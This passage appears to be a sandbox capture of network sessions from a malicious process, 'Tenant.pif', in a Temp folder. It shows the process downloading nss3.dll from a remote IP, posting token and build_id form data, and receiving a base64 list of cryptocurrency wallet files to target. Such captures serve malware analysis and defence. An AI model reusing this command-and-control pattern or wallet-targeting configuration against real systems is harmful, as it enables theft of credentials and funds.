                                                                                      2024-08-29 18:49:46 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                      Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                      2024-08-29 18:49:46 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                      Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                      2024-08-29 18:49:46 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                      Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.55995394.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:47 UTC222OUTGET /nss3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:47 UTC263INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:47 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2046288
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:47 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:47 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                      Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                      Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                      Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                      Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                      Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                      Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                      Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                      2024-08-29 18:49:47 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                      Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                      2024-08-29 18:49:48 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                      Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.55995494.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:51 UTC307OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 1145
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:51 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------FBFIDBFHDBGIDHJJEGHICont
                                                                                      2024-08-29 18:49:52 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.55995594.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:52 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDBGHDGHCGHCAAKFIIECCont
                                                                                      2024-08-29 18:49:53 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:53 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.55995694.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:53 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------HIIEBAFCBKFIDGCAKKKFCont
                                                                                      2024-08-29 18:49:54 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.55995794.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:55 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
